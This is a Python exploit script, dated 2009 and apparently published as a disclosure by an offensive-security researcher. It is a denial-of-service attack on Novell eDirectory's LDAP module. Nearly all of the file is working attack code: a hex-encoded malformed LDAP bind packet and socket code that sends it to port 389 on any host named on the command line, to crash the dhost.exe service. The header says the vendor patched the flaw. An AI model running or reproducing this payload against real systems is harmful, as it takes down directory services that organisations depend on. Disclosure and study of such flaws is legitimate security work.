#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed bind LDAP packet can make dhost.exe service crashing.
# 24/03/2009 Vendor notification; patched in 885 release
#
import sys
from socket import *
payload = (
"\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
"\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
"\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
"\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
"\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
"\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
"\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
"\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
)
s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
print s.recv(1024)
s.close()
print 'Done!'